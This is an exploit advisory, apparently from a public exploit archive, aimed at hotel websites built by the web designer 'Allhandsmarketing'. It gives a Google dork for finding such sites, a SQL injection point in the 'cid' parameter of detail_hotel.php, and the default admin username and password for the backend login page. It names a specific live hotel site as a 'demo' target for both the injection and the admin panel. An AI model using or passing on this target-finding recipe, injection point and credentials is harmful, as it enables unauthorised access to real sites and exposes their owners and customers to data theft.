# Exploit Title: Multiple Vulnerabilities Default Password - Sql Injection Allhandsmarketing Designer
# Google Dork: inurl:".php?cid=" intext:"Design by Allhandsmarketing"
#CWE: N/A
#CVE: N/A
# Exploit Author: ./LuLlaby007
--------------------------------------
[+]==================================================================
[+] Sql Injection :
http://site.co.li/detail_hotel.php?cid=36[exploit]&rname=xxxxxxxxxx
[+]
[+]==================================================================
[+] Demo :
[+] http://haspattaya.com/detail_hotel.php?cid=36&rname=Garden%20Hill%20Suite
[+]==================================================================
[+] Default U/P
[+] Admin Panel : http://site.co.li/backend/login.html
[+] USERNAME : admin
[+] PASSWORD : admin1234-
[+]
[+]==================================================================
[+]
[+] Demo :
[+] http://haspattaya.com/backend/login.html
